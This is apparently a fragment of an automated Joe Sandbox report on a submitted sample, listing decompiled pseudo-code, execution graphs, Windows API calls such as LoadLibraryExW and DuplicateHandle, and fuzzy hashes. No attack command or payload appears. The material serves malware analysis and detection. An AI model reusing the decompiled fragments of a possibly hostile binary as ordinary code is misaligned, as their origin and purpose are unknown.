                                                                                                                                                        							if(lstrcmpiA(lstrlenA(_a4) + _a4 - _t24, _t36) == 0) {
                                                                                                                                                        								goto L18;
                                                                                                                                                        							}
                                                                                                                                                        							_t32 = _v4;
                                                                                                                                                        							L11:
                                                                                                                                                        							_t28 = _t28 + 1;
                                                                                                                                                        						} while (_t28 < _t37);
                                                                                                                                                        					}
                                                                                                                                                        					goto L12;
                                                                                                                                                        				}
                                                                                                                                                        				if(_t30 != 1) {
                                                                                                                                                        					goto L5;
                                                                                                                                                        				}
                                                                                                                                                        				_t32 =  *0x40cab4; // 0x19b05a8
                                                                                                                                                        				_t37 =  *0x40c638; // 0x1
                                                                                                                                                        				goto L4;
                                                                                                                                                        			}













                                                                                                                                                        0x0040922c
                                                                                                                                                        0x00409234
                                                                                                                                                        0x00409236
                                                                                                                                                        0x0040923a
                                                                                                                                                        0x0040923e
                                                                                                                                                        0x00409240
                                                                                                                                                        0x00409242
                                                                                                                                                        0x00409255
                                                                                                                                                        0x0040925b
                                                                                                                                                        0x00409261
                                                                                                                                                        0x00409261
                                                                                                                                                        0x00409265
                                                                                                                                                        0x00409265
                                                                                                                                                        0x00409267
                                                                                                                                                        0x004092c6
                                                                                                                                                        0x004092ba
                                                                                                                                                        0x00000000
                                                                                                                                                        0x004092ba
                                                                                                                                                        0x004092c8
                                                                                                                                                        0x004092e5
                                                                                                                                                        0x004092e8
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x004092ea
                                                                                                                                                        0x004092ec
                                                                                                                                                        0x00000000
                                                                                                                                                        0x004092ee
                                                                                                                                                        0x0040926a
                                                                                                                                                        0x00409270
                                                                                                                                                        0x00409274
                                                                                                                                                        0x00409287
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00409289
                                                                                                                                                        0x0040928d
                                                                                                                                                        0x004092af
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x004092b1
                                                                                                                                                        0x004092b5
                                                                                                                                                        0x004092b5
                                                                                                                                                        0x004092b6
                                                                                                                                                        0x00409270
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0040926a
                                                                                                                                                        0x00409245
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00409247
                                                                                                                                                        0x0040924d
                                                                                                                                                        0x00000000

                                                                                                                                                        APIs
                                                                                                                                                        • lstrlenA.KERNEL32(?,00000000,74E06920,00000000,74E482B0,?,0040985A,00000000,00000001,?,00000000,?,?,?,?,?), ref: 00409274
                                                                                                                                                        • lstrlenA.KERNEL32(019F05A8,?,0040985A,00000000,00000001,?,00000000,?,?,?,?,?,00000000,?,00000000,?), ref: 0040927F
                                                                                                                                                        • lstrlenA.KERNEL32(00000000,?,0040985A,00000000,00000001,?,00000000,?,?,?,?,?,00000000,?,00000000,?), ref: 0040928D
                                                                                                                                                        • lstrlenA.KERNEL32(?,00000000,?,0040985A,00000000,00000001,?,00000000,?,?,?,?,?,00000000,?,00000000), ref: 0040929E
                                                                                                                                                        • lstrcmpiA.KERNEL32(00000000,?,0040985A,00000000,00000001,?,00000000,?,?,?,?,?,00000000,?,00000000,?), ref: 004092A7
                                                                                                                                                        • CompareStringA.KERNEL32(00000800,00000001,?,000000FF,019F05A8,000000FF,00000000,74E06920,00000000,74E482B0,?,0040985A,00000000,00000001,?,00000000), ref: 004092DA
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.587096613.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrlen$CompareStringlstrcmpi
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2377960101-0
                                                                                                                                                        • Opcode ID: 4b023d3ab0b36443064c838d60a6063ea5cf7ec1043fe769e0ba0e8e98d6b349
                                                                                                                                                        • Instruction ID: 627e10b669570f5a98b04cb8390fafee6493349fef4ae5e44f84baf28bf1f932
                                                                                                                                                        • Opcode Fuzzy Hash: 4b023d3ab0b36443064c838d60a6063ea5cf7ec1043fe769e0ba0e8e98d6b349
                                                                                                                                                        • Instruction Fuzzy Hash: 7521A436108245BBCB105FA49D84917B7E5FB45355F140A7EF552B36E2CB349C51CA88
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Execution Graph

                                                                                                                                                        Execution Coverage:8.1%
                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                        Total number of Nodes:57
                                                                                                                                                        Total number of Limit Nodes:6

                                                                                                                                                        Graph

                                                                                                                                                        execution_graph 14969 d4df00 SetWindowLongW 14970 d4df6c 14969->14970 14948 d46bd8 GetCurrentProcess 14949 d46c52 GetCurrentThread 14948->14949 14950 d46c4b 14948->14950 14951 d46c8f GetCurrentProcess 14949->14951 14952 d46c88 14949->14952 14950->14949 14953 d46cc5 14951->14953 14952->14951 14958 d47178 14953->14958 14960 d46d89 14953->14960 14954 d46ced GetCurrentThreadId 14955 d46d1e 14954->14955 14959 d47186 14958->14959 14959->14954 14961 d46dfa DuplicateHandle 14960->14961 14963 d46d92 14960->14963 14964 d46e96 14961->14964 14963->14954 14964->14954 14965 d4dcb8 14966 d4dd20 CreateWindowExW 14965->14966 14968 d4dddc 14966->14968 14971 d473a8 14972 d473bc 14971->14972 14974 d473f8 14972->14974 14975 d4682c 14972->14975 14976 d46837 14975->14976 14977 d478a0 14976->14977 14980 d4b870 14976->14980 14986 d4b858 14976->14986 14977->14974 14982 d4b8a1 14980->14982 14983 d4b8ee 14980->14983 14981 d4b8ad 14981->14977 14982->14981 14992 d4bbb8 14982->14992 14995 d4bba9 14982->14995 14983->14977 14988 d4b8a1 14986->14988 14989 d4b8ee 14986->14989 14987 d4b8ad 14987->14977 14988->14987 14990 d4bbb8 2 API calls 14988->14990 14991 d4bba9 2 API calls 14988->14991 14989->14977 14990->14989 14991->14989 14999 d4bbf8 14992->14999 14993 d4bbc2 14993->14983 14996 d4bbb8 14995->14996 14998 d4bbf8 2 API calls 14996->14998 14997 d4bbc2 14997->14983 14998->14997 15000 d4bc1b 14999->15000 15001 d4bc33 15000->15001 15007 d4be90 15000->15007 15011 d4be80 15000->15011 15001->14993 15002 d4be30 GetModuleHandleW 15004 d4be5d 15002->15004 15003 d4bc2b 15003->15001 15003->15002 15004->14993 15008 d4bea4 15007->15008 15010 d4bec9 15008->15010 15015 d4b000 15008->15015 15010->15003 15012 d4be90 15011->15012 15013 d4b000 LoadLibraryExW 15012->15013 15014 d4bec9 15012->15014 15013->15014 15014->15003 15016 d4c070 LoadLibraryExW 15015->15016 15018 d4c0e9 15016->15018 15018->15010

                                                                                                                                                        Executed Functions

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 00D46C38
                                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 00D46C75
                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 00D46CB2
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00D46D0B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000A.00000002.388632040.0000000000D40000.00000040.00000001.sdmp, Offset: 00D40000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_10_2_d40000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Current$ProcessThread
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2063062207-0
                                                                                                                                                        • Opcode ID: da6e0dda240d41b11d8fde02b9569753aef6ca3b5bb85c7e2c1eb6abe8dd15f9
                                                                                                                                                        • Instruction ID: 39ce1f6aef2e7842c3cc0f3bfb221a86e3ad990cd53058bb9fbe6b658a31b94c
                                                                                                                                                        • Opcode Fuzzy Hash: da6e0dda240d41b11d8fde02b9569753aef6ca3b5bb85c7e2c1eb6abe8dd15f9
                                                                                                                                                        • Instruction Fuzzy Hash: 875165B090024A8FDB14CFA9D588BDEBBF0EF89314F24846AE459B7750DB349844CF66
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 20 d46bd8-d46c49 GetCurrentProcess 21 d46c52-d46c86 GetCurrentThread 20->21 22 d46c4b-d46c51 20->22 23 d46c8f-d46cc3 GetCurrentProcess 21->23 24 d46c88-d46c8e 21->24 22->21 26 d46cc5-d46ccb 23->26 27 d46ccc-d46ce4 23->27 24->23 26->27 38 d46ce7 call d47178 27->38 39 d46ce7 call d46d89 27->39 30 d46ced-d46d1c GetCurrentThreadId 31 d46d25-d46d87 30->31 32 d46d1e-d46d24 30->32 32->31 38->30 39->30
                                                                                                                                                        APIs
                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 00D46C38
                                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 00D46C75
                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 00D46CB2
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00D46D0B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000A.00000002.388632040.0000000000D40000.00000040.00000001.sdmp, Offset: 00D40000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_10_2_d40000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Current$ProcessThread
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2063062207-0
                                                                                                                                                        • Opcode ID: 6947dcc406ba3bd1d7baa7385fce08bfe9b5281ce8f0923a7177733ed5558261
                                                                                                                                                        • Instruction ID: 962b7014a5875ed4cf134ce018b20978beea8100b070c2516113f40ad112f6a6
                                                                                                                                                        • Opcode Fuzzy Hash: 6947dcc406ba3bd1d7baa7385fce08bfe9b5281ce8f0923a7177733ed5558261
                                                                                                                                                        • Instruction Fuzzy Hash: 525144B090020A8FDB14CFA9D588BDEBBF4EF89314F248469E419B7750DB749844CF65
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 72 d4bbf8-d4bc1d call d4afa8 75 d4bc33-d4bc37 72->75 76 d4bc1f 72->76 77 d4bc39-d4bc43 75->77 78 d4bc4b-d4bc8c 75->78 126 d4bc25 call d4be90 76->126 127 d4bc25 call d4be80 76->127 77->78 83 d4bc8e-d4bc96 78->83 84 d4bc99-d4bca7 78->84 79 d4bc2b-d4bc2d 79->75 81 d4bd68-d4be28 79->81 121 d4be30-d4be5b GetModuleHandleW 81->121 122 d4be2a-d4be2d 81->122 83->84 86 d4bca9-d4bcae 84->86 87 d4bccb-d4bccd 84->87 88 d4bcb0-d4bcb7 call d4afb4 86->88 89 d4bcb9 86->89 90 d4bcd0-d4bcd7 87->90 93 d4bcbb-d4bcc9 88->93 89->93 94 d4bce4-d4bceb 90->94 95 d4bcd9-d4bce1 90->95 93->90 97 d4bced-d4bcf5 94->97 98 d4bcf8-d4bd01 call d4afc4 94->98 95->94 97->98 102 d4bd03-d4bd0b 98->102 103 d4bd0e-d4bd13 98->103 102->103 105 d4bd15-d4bd1c 103->105 106 d4bd31-d4bd3e 103->106 105->106 107 d4bd1e-d4bd2e call d499b0 call d4afd4 105->107 113 d4bd40-d4bd5e 106->113 114 d4bd61-d4bd67 106->114 107->106 113->114 123 d4be64-d4be78 121->123 124 d4be5d-d4be63 121->124 122->121 124->123 126->79 127->79
                                                                                                                                                        APIs
                                                                                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 00D4BE4E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000A.00000002.388632040.0000000000D40000.00000040.00000001.sdmp, Offset: 00D40000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_10_2_d40000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: HandleModule
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4139908857-0
                                                                                                                                                        • Opcode ID: 58f74e7fddf027c00bf2690b42f7b7dac109f5df26bfb35ca6ac032ccdac3036
                                                                                                                                                        • Instruction ID: 65d50f999cce2b85379b392dbfe7a23a830bf3131554cfa5aa161edd46c01cbd
                                                                                                                                                        • Opcode Fuzzy Hash: 58f74e7fddf027c00bf2690b42f7b7dac109f5df26bfb35ca6ac032ccdac3036
                                                                                                                                                        • Instruction Fuzzy Hash: C8813570A00B058FD724DF6AD08579ABBF1BF88314F04896EE486D7A50DB35E949CFA1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 128 d4dcad-d4dd1e 129 d4dd20-d4dd26 128->129 130 d4dd29-d4dd30 128->130 129->130 131 d4dd32-d4dd38 130->131 132 d4dd3b-d4dd73 130->132 131->132 133 d4dd7b-d4ddda CreateWindowExW 132->133 134 d4dde3-d4de1b 133->134 135 d4dddc-d4dde2 133->135 139 d4de1d-d4de20 134->139 140 d4de28 134->140 135->134 139->140 141 d4de29 140->141 141->141
                                                                                                                                                        APIs
                                                                                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00D4DDCA
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000A.00000002.388632040.0000000000D40000.00000040.00000001.sdmp, Offset: 00D40000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_10_2_d40000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 716092398-0
                                                                                                                                                        • Opcode ID: f589e53b8fbaa0084dbccd436ad3f60b2cf2a146214786f202f5b6d498e129a2
                                                                                                                                                        • Instruction ID: fdaff9a30d767606dff09f4084b9b05648b20b9fa68b1c4fb663ba1bf9e38538
                                                                                                                                                        • Opcode Fuzzy Hash: f589e53b8fbaa0084dbccd436ad3f60b2cf2a146214786f202f5b6d498e129a2
                                                                                                                                                        • Instruction Fuzzy Hash: 9551A2B1D10319DFDB14CFA9C884ADEBBB6FF88314F24852AE819AB210D7749945CF90
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 142 d4dcb8-d4dd1e 143 d4dd20-d4dd26 142->143 144 d4dd29-d4dd30 142->144 143->144 145 d4dd32-d4dd38 144->145 146 d4dd3b-d4ddda CreateWindowExW 144->146 145->146 148 d4dde3-d4de1b 146->148 149 d4dddc-d4dde2 146->149 153 d4de1d-d4de20 148->153 154 d4de28 148->154 149->148 153->154 155 d4de29 154->155 155->155
                                                                                                                                                        APIs
                                                                                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00D4DDCA
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000A.00000002.388632040.0000000000D40000.00000040.00000001.sdmp, Offset: 00D40000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_10_2_d40000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 716092398-0
                                                                                                                                                        • Opcode ID: efb1e1d96ce3b06cc2dc235dc08b7ca53035de37f033dacae33eaa89710f6341
                                                                                                                                                        • Instruction ID: 47cf0fcb085412385d7f385f90035aa1f6a919c2a852973f37636c9426a977e8
                                                                                                                                                        • Opcode Fuzzy Hash: efb1e1d96ce3b06cc2dc235dc08b7ca53035de37f033dacae33eaa89710f6341
                                                                                                                                                        • Instruction Fuzzy Hash: A141B0B1D00319DFDF14CF99C884ADEBBB6BF88314F24852AE919AB210D7749845CF90
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 156 d46d89-d46d90 157 d46d92-d46dc1 call d467cc 156->157 158 d46dfa-d46e94 DuplicateHandle 156->158 161 d46dc6-d46dec 157->161 163 d46e96-d46e9c 158->163 164 d46e9d-d46eba 158->164 163->164
                                                                                                                                                        APIs
                                                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00D46E87
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000A.00000002.388632040.0000000000D40000.00000040.00000001.sdmp, Offset: 00D40000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_10_2_d40000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DuplicateHandle
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3793708945-0
                                                                                                                                                        • Opcode ID: 505b9b56757ca807e5641d7a45bac289fef26b5f46411203fe8f07ed3fc90c08
                                                                                                                                                        • Instruction ID: cfe143dec6c7a08c0b6d6de110760f77e51c1dd613af49959a5d4e3049322269
                                                                                                                                                        • Opcode Fuzzy Hash: 505b9b56757ca807e5641d7a45bac289fef26b5f46411203fe8f07ed3fc90c08
                                                                                                                                                        • Instruction Fuzzy Hash: 3A417C769002099FCB01CFA9D844ADEBFF9FF89320F14806AE915A7320D3359955CFA0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 169 d46ebf-d46ecc 170 d46ece 169->170 171 d46e79-d46e94 DuplicateHandle 169->171 172 d46ed0-d46edb 170->172 173 d46e96-d46e9c 171->173 174 d46e9d-d46eba 171->174 176 d46ee6-d46fee 172->176 173->174
                                                                                                                                                        APIs
                                                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00D46E87
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000A.00000002.388632040.0000000000D40000.00000040.00000001.sdmp, Offset: 00D40000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_10_2_d40000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DuplicateHandle
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3793708945-0
                                                                                                                                                        • Opcode ID: f25275491c5b3cc68f109f8c84e13d5fa53627a873d986237a9bd8f9a34f52f2
                                                                                                                                                        • Instruction ID: 7ec14573789bcfb758bb5fdaa765f620aba8c0cc0e5a1535b1dad65dddd52339
                                                                                                                                                        • Opcode Fuzzy Hash: f25275491c5b3cc68f109f8c84e13d5fa53627a873d986237a9bd8f9a34f52f2
                                                                                                                                                        • Instruction Fuzzy Hash: 8D316EB8644340DFE7189F60F44476D7BA5FB89711F10843AEA518B3D9DB795884CF21
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 188 d46df8-d46e72 190 d46e79-d46e94 DuplicateHandle 188->190 191 d46e96-d46e9c 190->191 192 d46e9d-d46eba 190->192 191->192
                                                                                                                                                        APIs
                                                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00D46E87
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000A.00000002.388632040.0000000000D40000.00000040.00000001.sdmp, Offset: 00D40000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_10_2_d40000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DuplicateHandle
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3793708945-0
                                                                                                                                                        • Opcode ID: fcf0915605b03efa81d2e562aa425c35504bf2abaf5bcf1634aee8a41e7e5984
                                                                                                                                                        • Instruction ID: 682d83f1ea8247fd7413f3edacc795baa753d03a49bc4706b86578a221c4ca4f
                                                                                                                                                        • Opcode Fuzzy Hash: fcf0915605b03efa81d2e562aa425c35504bf2abaf5bcf1634aee8a41e7e5984
                                                                                                                                                        • Instruction Fuzzy Hash: AF2105B59002499FCB00CFAAD484ADEFBF8EF49324F14841AE954B7310D374A954CFA1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 195 d46e00-d46e72 196 d46e79-d46e94 DuplicateHandle 195->196 197 d46e96-d46e9c 196->197 198 d46e9d-d46eba 196->198 197->198
                                                                                                                                                        APIs
                                                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00D46E87
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000A.00000002.388632040.0000000000D40000.00000040.00000001.sdmp, Offset: 00D40000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_10_2_d40000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DuplicateHandle
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3793708945-0
                                                                                                                                                        • Opcode ID: a1bad842dfead8aa6a38be7d89b9b5ebb9bd7463b0c7eff6e517c00cb0b250f1
                                                                                                                                                        • Instruction ID: a3300000f902e9404ff1720136f7dde35944b73b40e8cc1ea5eae22bc80f6750
                                                                                                                                                        • Opcode Fuzzy Hash: a1bad842dfead8aa6a38be7d89b9b5ebb9bd7463b0c7eff6e517c00cb0b250f1
                                                                                                                                                        • Instruction Fuzzy Hash: FE21E2B5D002199FDB10CFAAD884ADEBBF8FF48320F14842AE914A3310D374A954CFA1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 209 d4c068-d4c0b0 211 d4c0b2-d4c0b5 209->211 212 d4c0b8-d4c0e7 LoadLibraryExW 209->212 211->212 213 d4c0f0-d4c10d 212->213 214 d4c0e9-d4c0ef 212->214 214->213
                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00D4BEC9,00000800,00000000,00000000), ref: 00D4C0DA
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000A.00000002.388632040.0000000000D40000.00000040.00000001.sdmp, Offset: 00D40000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_10_2_d40000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1029625771-0
                                                                                                                                                        • Opcode ID: 630c83c2d039ee60d2974f862cbe75f7df2347b8f65b32d9b3f3d060f7c0a102
                                                                                                                                                        • Instruction ID: d85db7e0ff1f85fe97dbbcce2e90afcfa0b37f5b50c4c9224d6ed57fbc5d178d
                                                                                                                                                        • Opcode Fuzzy Hash: 630c83c2d039ee60d2974f862cbe75f7df2347b8f65b32d9b3f3d060f7c0a102
                                                                                                                                                        • Instruction Fuzzy Hash: BD1136B6D002498FCB10CFAAC444ADEFBF4AB88324F14842EE515B7200C375A945CFA1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 201 d4b000-d4c0b0 203 d4c0b2-d4c0b5 201->203 204 d4c0b8-d4c0e7 LoadLibraryExW 201->204 203->204 205 d4c0f0-d4c10d 204->205 206 d4c0e9-d4c0ef 204->206 206->205
                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00D4BEC9,00000800,00000000,00000000), ref: 00D4C0DA
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000A.00000002.388632040.0000000000D40000.00000040.00000001.sdmp, Offset: 00D40000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_10_2_d40000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1029625771-0
                                                                                                                                                        • Opcode ID: 5a9c02ed512f703a55280ec7d7595e8568169c4b714065a5b236c82c96ce0ee0
                                                                                                                                                        • Instruction ID: c353c6c790c1a06bf5b3b4c893055f0d79ba0af5ceb98b5fa0a6867e2da1bac3
                                                                                                                                                        • Opcode Fuzzy Hash: 5a9c02ed512f703a55280ec7d7595e8568169c4b714065a5b236c82c96ce0ee0
                                                                                                                                                        • Instruction Fuzzy Hash: B31103B6901209CFCB10CF9AD444BDEFBF8EB89324F14842AE915B7600C375A945CFA5
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 217 d4def8-d4df6a SetWindowLongW 218 d4df73-d4df87 217->218 219 d4df6c-d4df72 217->219 219->218
                                                                                                                                                        APIs
                                                                                                                                                        • SetWindowLongW.USER32(?,?,?), ref: 00D4DF5D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000A.00000002.388632040.0000000000D40000.00000040.00000001.sdmp, Offset: 00D40000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_10_2_d40000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LongWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1378638983-0
                                                                                                                                                        • Opcode ID: ea18df39c59d775b86eeadc8ee6d8febdd88342e44a48ae28e2ba340d9a61d5c
                                                                                                                                                        • Instruction ID: 0dba5e116af8faddb346fe1b72e25ec87565d9ca7f217a93a2fc67ed6df6b062
                                                                                                                                                        • Opcode Fuzzy Hash: ea18df39c59d775b86eeadc8ee6d8febdd88342e44a48ae28e2ba340d9a61d5c
                                                                                                                                                        • Instruction Fuzzy Hash: 831125B58002499FCB20CFA9D489BDEBBF4EF89324F24845AD919A7300C375A945CFA1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 221 d4bde8-d4be28 222 d4be30-d4be5b GetModuleHandleW 221->222 223 d4be2a-d4be2d 221->223 224 d4be64-d4be78 222->224 225 d4be5d-d4be63 222->225 223->222 225->224
                                                                                                                                                        APIs
                                                                                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 00D4BE4E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000A.00000002.388632040.0000000000D40000.00000040.00000001.sdmp, Offset: 00D40000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_10_2_d40000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: HandleModule
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4139908857-0
                                                                                                                                                        • Opcode ID: 17966ccd526739cd79388af733da548d2e2a10802ae5d71d849483d57b15b6c3
                                                                                                                                                        • Instruction ID: 4adbd7cb63fecda39f8eff3a991b0c434e879dad093c182441cbc27ed524534a
                                                                                                                                                        • Opcode Fuzzy Hash: 17966ccd526739cd79388af733da548d2e2a10802ae5d71d849483d57b15b6c3
                                                                                                                                                        • Instruction Fuzzy Hash: 9811DFB5D006498FCB10CFAAC444BDEFBF9AF88324F14842AD929A7610D375A945CFA1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 227 d4df00-d4df6a SetWindowLongW 228 d4df73-d4df87 227->228 229 d4df6c-d4df72 227->229 229->228
                                                                                                                                                        APIs
                                                                                                                                                        • SetWindowLongW.USER32(?,?,?), ref: 00D4DF5D
                                                                                                                                                        Memory Dump Source
